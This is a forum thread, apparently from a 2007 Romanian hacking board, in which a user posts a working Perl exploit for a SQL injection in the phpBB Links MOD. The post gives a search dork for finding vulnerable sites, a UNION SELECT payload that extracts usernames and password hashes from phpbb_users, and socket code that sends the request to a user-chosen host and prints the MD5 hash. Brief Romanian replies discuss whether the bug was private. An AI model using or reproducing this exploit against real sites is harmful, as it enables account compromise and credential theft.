Ras Posted August 31, 2007 Report Posted August 31, 2007 #!/usr/bin/perlprint q{phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection ExploitBug discovered by DonDork: allinurl:links.php?t=search or: "Links MOD v1.2.2 by phpBB2.de"SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*};use IO::Socket;print q{=> Insert URL=> without ( http )=> };$server = <STDIN>;chop ($server);print q{=> Insert directory=> es: /forum/ - /phpBB2/=> };$dir = <STDIN>;chop ($dir);print q{=> User ID=> Number:=> };$user = <STDIN>;chop ($user);if (!$ARGV[2]) {}$myuser = $ARGV[3];$mypass = $ARGV[4];$myid = $ARGV[5];$server =~ s/(http:\/\/)//eg;$path = $dir;$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";print "Exploit in process...\r\n";$socket = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$server",PeerPort => "80") || die "Exploit failed";print "Exploit\r\n";print "in process...\r\n";print $socket "GET $path HTTP/1.1\r\n";print $socket "Host: $server\r\n";print $socket "Accept: */*\r\n";print $socket "Connection: close\r\n\r\n";print "Exploit finished!\r\n\r\n";while ($answer = <$socket>){if ($answer =~/(\w{32})/){if ($1 ne 0) {print "MD5-Hash is: ".$1."\r\n";}exit();}} Quote
kw3rln Posted August 31, 2007 Report Posted August 31, 2007 fuck..eu cu sysghost am mai avut privat bugu asta Quote
Ras Posted August 31, 2007 Author Report Posted August 31, 2007 fuck..eu cu sysghost am mai avut privat bugu asta e public de mai mult timp dar nu l-am pus eu aici imi cer scuze pt offtopic. Quote